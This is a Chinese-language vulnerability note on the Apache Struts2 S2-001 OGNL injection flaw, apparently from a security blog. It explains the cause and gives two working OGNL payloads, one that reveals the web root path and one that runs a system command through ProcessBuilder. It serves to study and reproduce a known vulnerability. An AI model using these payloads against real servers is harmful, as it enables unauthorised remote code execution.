Apache Struts2

# Apache Struts2

Struts是Apache软件基金会（ASF）赞助的一个开源项目。它最初是Jakarta项目中的一个子项目，并在2004年3月成为ASF的顶级项目。它通过采用Java Servlet/JSP技术，实现了基于Java EE Web应用的Model-View-Controller（MVC）设计模式的应用框架，是MVC经典设计模式中的一个经典产品。

Struts2是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本，它是一个完全重写的 Struts 架构。

# S2-001 远程代码执行漏洞

### 漏洞描述

该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。

例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行。

```
OGNL表达式，OGNL 是 Object Graphic Navigation Language(对象图导航语言)的缩写，它是一种功能强大的表达式语言，使用它可以存取对象的任意属性，调用对象的方法，使用 OGNL 表达式的主要作用是简化访问对象中的属性值，但Struts2漏洞就源于OGNL。
```

![0dacfcf1d0dac116d8e9ba97f23010f2](https://oss.maolin101.com/20250110172502786.png-101.webp)

影响版本：Struts 2.0.0 - Struts 2.0.8

### 漏洞复现

![image-20221223101635785](https://oss.maolin101.com/20250110172502787.png-101.webp)

对该页面进行抓取数据包，获取web路径

POC：

```
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
```

进行url编码后在执行

![image-20221223103519192](https://oss.maolin101.com/20250110172502788.png-101.webp)

执行系统命令

```
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
```

先进行URL编码再进行执行

显示当前路径

![image-20221223103636388](https://oss.maolin101.com/20250110172502789.png-101.webp)